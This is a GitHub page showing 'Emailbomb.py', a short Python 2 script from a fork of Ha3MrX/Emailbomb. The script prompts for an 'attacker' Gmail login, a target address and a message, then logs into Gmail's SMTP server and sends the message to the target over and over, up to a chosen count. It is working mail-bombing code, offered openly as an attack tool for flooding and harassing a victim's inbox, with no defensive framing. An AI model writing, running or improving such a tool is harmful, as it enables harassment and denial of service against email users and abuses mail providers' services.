forked from Ha3MrX/Emailbomb
-
Notifications
You must be signed in to change notification settings - Fork 2
Expand file tree
/
Copy pathEmailbomb.py
More file actions
77 lines (58 loc) · 2.21 KB
/
Emailbomb.py
File metadata and controls
77 lines (58 loc) · 2.21 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
#!/usr/bin/python
#E-bomber
import os
import smtplib
import getpass
import sys
import time
print ' '
print ' '
print ' ################################################# '
print ' # # '
print ' # Email Bomb # '
print ' # # '
print ' # create By HA-MRX # '
print ' # # '
print ' # https://www.youtube.com/c/HA-MRX # '
print ' # # '
print ' # https://kurdkali.wordpress.com/ # '
print ' # # '
print ' # https://www.facebook.com/muhamad.jabar222 # '
print ' ################################################# '
print ' '
print ' '
print ' '
email = raw_input('Attacker Gmail Address : ')
print ' '
user = raw_input('Anonymous name : ')
print ' '
passwd = getpass.getpass('Password: ')
print ' '
to = raw_input('\nTo: ')
print ' '
body = raw_input('Message: ')
print ' '
total = input('Number of send: ')
smtp_server = 'smtp.gmail.com'
port = 587
print ''
try:
server = smtplib.SMTP(smtp_server,port)
server.ehlo()
server.starttls()
server.login(email,passwd)
for i in range(1, total+1):
subject = os.urandom(9)
msg = 'From: ' + user + '\nSubject: ' + '\n' + body
server.sendmail(email,to,msg)
print "\rE-mails sent: %i" % i
time.sleep(1)
sys.stdout.flush()
server.quit()
print '\n Done !!!'
except KeyboardInterrupt:
print '[-] Canceled'
sys.exit()
except smtplib.SMTPAuthenticationError:
print '\n[!] The username or password you entered is incorrect.'
sys.exit()